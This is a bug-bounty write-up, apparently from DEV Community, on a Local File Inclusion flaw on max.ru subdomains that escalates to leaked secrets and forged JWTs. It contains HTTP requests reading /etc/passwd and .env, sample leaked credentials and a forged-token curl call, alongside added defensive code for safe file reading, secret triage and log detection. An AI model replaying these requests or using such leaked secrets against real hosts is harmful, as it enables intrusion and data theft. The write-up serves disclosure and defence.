DEV Community

Dmitry Sorokin (@sorydima)

πŸ” From LFI to Full Infrastructure Compromise β€” A CVSS 9.0 Real-World Case Study

This is the story of how a seemingly simple Local File Inclusion (LFI) vulnerability escalated into a complete API and infrastructure compromise during a bug bounty engagement.

The vulnerability allowed me to retrieve sensitive configuration files from *.max.ru subdomains, extract credentials, forge authentication tokens, and ultimately access private APIs and source code repositories.

πŸ“Ί PoC Video: YouTube
πŸ“‚ Evidence & Full Report: Yandex Disk


1️⃣ Reconnaissance & Initial Finding

During reconnaissance of the max.ru domain, I focused on parameters likely to handle file input. Two subdomains stood out:

  • business.max.ru
  • help.max.ru

The file parameter behaved suspiciously. Testing with /etc/passwd returned actual system file contents β€” a classic LFI signature.

Example test:

GET https://business.max.ru/?file=/etc/passwd HTTP/1.1
Host: business.max.ru
User-Agent: Mozilla/5.0
Accept: */*

Response (truncated):

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

The parameter was handed to the filesystem without validation, so any file readable by the web server process (www-data here) could be retrieved.
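To show why `?file=/etc/passwd` comes back with file contents, here is the code pattern behind this bug class next to a hardened reader. This is an added example, not the target's code (the write-up does not show it): the page names and the allow-list are hypothetical, and the demo builds a throwaway web root with a constructed .env outside it. It also covers a symlink inside the allow-listed directory, which an allow-list alone does not catch.

```python
import os
import tempfile

# Hypothetical allow-list of page names the application may serve (not from the write-up)
ALLOWED_PAGES = {
    "faq": "pages/faq.html",
    "pricing": "pages/pricing.html",
    "legacy": "pages/legacy.html",   # becomes a symlink in the demo, to show why realpath matters
}


def vulnerable_read(web_root: str, file_param: str) -> bytes:
    """The bug class behind '?file=/etc/passwd': untrusted input joined into a path and opened.
    os.path.join discards web_root entirely when file_param is absolute, and '../' walks out of it."""
    with open(os.path.join(web_root, file_param), "rb") as fh:
        return fh.read()


def safe_read(web_root: str, file_param: str) -> bytes:
    """Allow-list first, then confine the resolved path to web_root (following symlinks)."""
    rel = ALLOWED_PAGES.get(file_param)
    if rel is None:
        raise PermissionError(f"unknown page {file_param!r}")
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, rel))
    # Defence in depth: even an allow-listed entry must resolve inside the web root
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("resolved path escapes web root")
    with open(target, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Build a throwaway web root plus a constructed .env outside it, exercise both readers."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "www")
        os.makedirs(os.path.join(root, "pages"))
        with open(os.path.join(root, "pages", "faq.html"), "w") as fh:
            fh.write("<h1>FAQ</h1>")
        secret = os.path.join(tmp, ".env")               # constructed stand-in for a real .env
        with open(secret, "w") as fh:
            fh.write("JWT_SECRET=constructed-example-secret\n")
        # An allow-listed file that is really a symlink pointing outside the web root
        os.symlink(secret, os.path.join(root, "pages", "legacy.html"))

        out = {}
        out["vuln_absolute"] = b"JWT_SECRET" in vulnerable_read(root, secret)
        out["vuln_traversal"] = b"JWT_SECRET" in vulnerable_read(root, "../.env")
        out["safe_allowed"] = safe_read(root, "faq") == b"<h1>FAQ</h1>"
        for label, bad in (("traversal", "../.env"), ("absolute", secret), ("symlink", "legacy")):
            try:
                safe_read(root, bad)
                out["safe_blocks_" + label] = False
            except PermissionError:
                out["safe_blocks_" + label] = True
        return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The two-layer check matters: the allow-list stops attacker-chosen names, and the realpath confinement stops an allow-listed name that resolves somewhere unexpected, such as the symlink case above.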


2️⃣ Targeting High-Value Files

Once confirmed, I prioritized files with the highest potential impact:

| File | Purpose | Potential Risk |
| --- | --- | --- |
| .env | Environment variables | JWT secrets, DB creds, API keys |
| config.php | Application configuration | Database connection strings |
| .git/config | Git repo configuration | Repository URLs and tokens |
| /var/www/html/config/database.php | DB credentials | Full DB access |
| /proc/self/environ | Runtime env vars | Tokens in memory |

Example request for .env:

GET https://help.max.ru/?file=/.env HTTP/1.1
Host: help.max.ru
User-Agent: curl/7.68.0
Accept: */*

Example response:

APP_ENV=production
DB_HOST=db.max.ru
DB_USER=max_prod
DB_PASSWORD=Sup3rS3cretPass
JWT_SECRET=4a9c9b8f8d2a46f83d8e70f...
GIT_TOKEN=ghp_7d9f4a8321b...
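Added example (not from the original report) for triaging what an LFI returns: a check that a response really is /etc/passwd rather than an error page that happens to contain the string, and a .env parser that flags which values need rotating. The sample bodies are constructed from the truncated responses shown above; the key-name patterns and token prefixes (ghp_ is GitHub's classic PAT prefix, github_pat_ the fine-grained one, AKIA an AWS access key id) are my own starting set.

```python
import re

# Constructed sample bodies, copied from the truncated responses in the write-up
PASSWD_BODY = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

ENV_BODY = """APP_ENV=production
DB_HOST=db.max.ru
DB_USER=max_prod
DB_PASSWORD=Sup3rS3cretPass
JWT_SECRET=4a9c9b8f8d2a46f83d8e70f...
GIT_TOKEN=ghp_7d9f4a8321b...
"""

# One well-formed passwd entry: name:passwd:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    r"^[a-z_][a-z0-9_-]*:[x*!]*:\d+:\d+:[^:]*:/[^:]*:/[^:]*$", re.M
)


def is_passwd_leak(body: str, min_lines: int = 2) -> bool:
    """True when the body carries at least min_lines structurally valid passwd entries,
    which separates a real file read from an error page quoting 'root:x:0:0'."""
    return len(PASSWD_LINE.findall(body)) >= min_lines


def parse_dotenv(body: str) -> dict:
    """Minimal KEY=VALUE parser: skips blanks and comments, strips matching quotes."""
    out = {}
    for line in body.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        out[key.strip()] = value
    return out


SENSITIVE_KEY = re.compile(r"SECRET|PASSWORD|PASSWD|TOKEN|API_KEY|PRIVATE_KEY", re.I)
# Value prefixes with a known meaning; identifying the issuer tells you where to rotate
KNOWN_PREFIXES = {
    "ghp_": "GitHub classic PAT",
    "github_pat_": "GitHub fine-grained PAT",
    "AKIA": "AWS access key id",
}


def triage_secrets(env: dict) -> list:
    """Return (key, reason) pairs for values that must be rotated; prefix match wins over key name."""
    findings = []
    for key, value in env.items():
        reason = None
        for prefix, label in KNOWN_PREFIXES.items():
            if value.startswith(prefix):
                reason = label
                break
        if reason is None and SENSITIVE_KEY.search(key):
            reason = "sensitive key name"
        if reason:
            findings.append((key, reason))
    return findings


if __name__ == "__main__":
    print("passwd leak:", is_passwd_leak(PASSWD_BODY))
    for key, reason in triage_secrets(parse_dotenv(ENV_BODY)):
        print(f"rotate {key}: {reason}")
```

The prefix check runs before the key-name check on purpose: a GitHub PAT stored under a bland name like GIT_TOKEN still gets attributed to GitHub, which is the information the rotation ticket needs.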

3️⃣ Secrets Obtained

The extracted configuration files revealed multiple high-value secrets:

  • JWT_SECRET β€” used to sign and validate authentication tokens
  • DB_USER / DB_PASSWORD β€” full database credentials
  • GitHub Personal Access Token β€” R/W access to private repositories
  • Third-party API keys β€” payment gateways, analytics, and internal tools

4️⃣ Exploiting the JWT_SECRET

With the JWT_SECRET, I could:

  1. Forge my own valid JSON Web Tokens
  2. Replay existing leaked tokens
  3. Impersonate any user, including administrators

PoC request using forged token:

curl -H "Authorization: Bearer forged_admin_token" \
     https://api.oneme.ru/api/user

Result:
Private API endpoints returned data without any password authentication.


5️⃣ Impact Analysis

The vulnerability chain enabled:

  • Full API compromise β€” direct access to private endpoints
  • Database breach β€” ability to dump, alter, or delete data
  • Source code leak β€” private Git repos accessible with leaked tokens
  • Lateral movement β€” potential pivot to other internal services

Risk mapping (MITRE ATT&CK):

  • T1005 – Data from Local System
  • T1552.001 – Unsecured Credentials: Credentials In Files
  • T1606 – Forge Web Credentials (minting tokens with the leaked JWT_SECRET)
  • T1550.001 – Use Alternate Authentication Material: Application Access Token
  • T1078 – Valid Accounts

6️⃣ CVSS Scoring

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Score: 9.0 (Critical), as reported

Note that the score and the vector do not agree: the vector string as written evaluates to 10.0 in the CVSS 3.1 calculator (changed scope, High on all three impact metrics, no exploitability penalties). 9.0 is what the same metrics produce with AC:H. Quote the vector and the score together when submitting so the triager can see which one was intended.

Breakdown:

  • AV:N: network exploitable
  • AC:L: low attack complexity (a single GET, no race or special conditions)
  • PR:N: no privileges required
  • UI:N: no user interaction required
  • S:C: scope change (the web server flaw reaches the API, database and Git hosting, which are separate security authorities)
  • C:H / I:H / A:H: high impact on confidentiality, integrity and availability; C and I are demonstrated directly, A rests on the database credentials allowing data to be deleted

7️⃣ Recommendations

  1. Input Validation: never pass the file parameter to the filesystem. Map it to an allow-list of page names, and confine any resolved path to the web root as a second check.
  2. Access Controls: deny web access to dotfiles and configuration files (.env, .git/, config/) in the server configuration, and keep them outside the document root altogether.
  3. Secret Management: keep production secrets out of deployable code and out of the web root; inject them at runtime from a secret store.
  4. Token Rotation: rotate JWT_SECRET, the database password, the Git token and every third-party key immediately. Rotating the JWT secret is the only way to invalidate tokens that have already been forged, so plan for a forced re-login of all users.
  5. Logging & Monitoring: alert on file-style parameters carrying absolute paths, ../ sequences or names such as .env and /etc/passwd, and prioritise the ones that got a 200 response.
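Added example for the logging and monitoring recommendation, not part of the original post: a scanner over combined-format access log lines that flags file-style parameters carrying traversal, absolute paths or known sensitive filenames, including double-encoded variants. The log lines are constructed to mirror the requests from sections 1 and 2 (with RFC 5737 documentation addresses); the parameter-name list and patterns are a starting point, not a complete signature set.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines modelled on the write-up's requests; addresses are RFC 5737 ranges
SAMPLE_LOG = """203.0.113.7 - - [10/Oct/2025:12:00:01 +0000] "GET /?file=/etc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2025:12:00:02 +0000] "GET /?file=/.env HTTP/1.1" 200 412 "-" "curl/7.68.0"
198.51.100.4 - - [10/Oct/2025:12:00:03 +0000] "GET /?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2025:12:00:04 +0000] "GET /?file=faq HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2025:12:00:05 +0000] "GET /images/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method target proto" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Query parameter names that commonly end up on the filesystem (assumed list, extend per app)
FILE_PARAMS = {"file", "page", "path", "template", "include", "doc"}
SENSITIVE_TARGETS = re.compile(
    r"(^|/)(etc/(passwd|shadow)|\.env|\.git/|proc/self/environ|config\.php|database\.php)", re.I
)
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|^/)")


def classify(target: str) -> list:
    """Return the reasons a request target looks like an LFI attempt; empty list means benign."""
    reasons = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() not in FILE_PARAMS:
            continue
        # parse_qsl decoded once already; decoding twice more collapses %252e%252e style evasion
        value = unquote(unquote(raw))
        if TRAVERSAL.search(value):
            reasons.append(f"{name}: traversal or absolute path")
        if SENSITIVE_TARGETS.search(value):
            reasons.append(f"{name}: sensitive file name")
    return reasons


def scan_log(text: str) -> list:
    """Run classify() over each parsable line; keep status so 200s can be prioritised."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = classify(m["target"])
        if reasons:
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "target": m["target"],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["target"], "|", "; ".join(hit["reasons"]))
```

Matching on the decoded parameter value rather than the raw URL is what makes the third line fire; a naive substring search for "../" in the raw log would miss the %2F form.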

8️⃣ Key Takeaways for Bug Hunters

  • Never underestimate an LFI β€” the real impact is in what it reveals.
  • .env and config.php are gold mines for credentials.
  • JWT secrets are as sensitive as passwords β€” treat them accordingly.
  • Git tokens can expose entire source codebases.
  • Always think in terms of attack chains, not isolated bugs.

Keywords: LFI, Local File Inclusion, JWT Bypass, Token Replay, Auth Bypass, API Hack, Bug Bounty, Pentest, Web Security, CVSS 9.0, Security Research, Exploit


This case reinforces a core truth in offensive security:

A single weak link β€” if exploited fully β€” can unravel the entire security posture of an organization.
